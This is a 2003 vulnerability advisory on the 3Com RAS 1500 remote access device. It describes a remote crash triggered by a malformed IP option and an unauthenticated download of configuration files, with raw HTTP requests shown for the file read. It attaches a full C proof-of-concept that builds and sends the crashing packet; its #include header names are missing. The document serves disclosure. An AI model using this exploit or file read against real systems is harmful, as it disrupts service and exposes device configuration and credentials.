Synopsis: 3com RAS 1500 Remote vulnerabilities. Product: 3C433279A-US http://www.3com/ras1500 Version: Firmware X2.0.10 URL: http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt Author: Piotr Chytla Date: February 27, 2003 Issue: ------ 3com SuperStack II Remote Access System 1500 is telco device which provides access via BRI-ISDN/Analog to dialin users. It contains two remote vulnerabilities, first is Denial Of Service that leads to system crash, second can be used to read configuration files. Details: ------- 1. Remote Denial of Service It is possible to remotely reboot RAS 1500 (Router unit) system by sending malformed packet with ip option len field set to zero. This bug can cause loosing all switched connections on PRI-ISDN interface. 2. Configuration file read Unauthorized user can read configuration and system files, using web interface on RAS 1500 . GET /download.htm HTTP/1.0 HTTP/1.0 401 Unauthorized WWW-Authenticate: Basic realm="RAS1500" Content-Type: text/html Server: Allegro-Software-RomPager/2.10 GET /user_settings.cfg HTTP/1.0 HTTP/1.0 200 OK Content-Type: multipart Date: Mon, 25 May 1998 00:26:38 GMT Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT Content-Length: 1258 Server: Allegro-Software-RomPager/2.10 [..] content of user_setting.cfg RAS 1500 requires HTTP basic authorization only for download.htm file, which is download manager for configuration files and system software. Unfortunately system images and configuration files are not protected by HTTP authorization. Impact: ------- Malicious user is able to remotely crash RAS 1500 - Router Unit, this cause dropping all switched connections to PRI-ISDN interface. Remote attacker can also read and modify RAS configuration when he broke access passwords. Exploit: -------- Below is attached a working proof-of-concept exploit for vulnerability no.1. ------X<------isec-options------X<------ /* * 3com superstack II RAS 1500 remote Denial of Service * * Piotr Chytla * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY * * (c) 2003 Copyright by iSEC Security Research */ #include #include #include #include #define OPT_LEN 4 void usage() { printf("Args: \n"); printf("-s [source address]\n"); printf("-d [destination address]\n"); } int main(int argc,char *argv[]) { char a; int sock,r; u_long src; u_long dst; char pktbuf[IP_MAXPACKET]; char payload[]="ABCDEFGHIJKLMNOPRST"; u_char options[4]; struct ipoption ipopt; bzero(options,OPT_LEN); while((a=getopt(argc,argv,"d:s:h?"))!=EOF) { switch(a) { case 'h' : { usage(); exit(1); } case 's' : { src=libnet_name_resolve(optarg,0); break;} case 'd' : { dst=libnet_name_resolve(optarg,0); break;} } } sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock<0) { perror("socket"); exit(1); } libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf); memcpy(ipopt.ipopt_list, options, OPT_LEN); *(ipopt.ipopt_list) = 0xe4; *(ipopt.ipopt_list+1) = 0; *(ipopt.ipopt_list+1) = 0; *(ipopt.ipopt_list+1) = 0; r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf); if (r <0) { libnet_close_raw_sock(sock); printf("Error ip options insertion failed\n"); exit(1); } r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload)); if (r<0) { libnet_close_raw_sock(sock); printf("Error write_ip \n"); exit(1); } libnet_close_raw_sock(sock); return 0; } ------X<------isec-options------X<------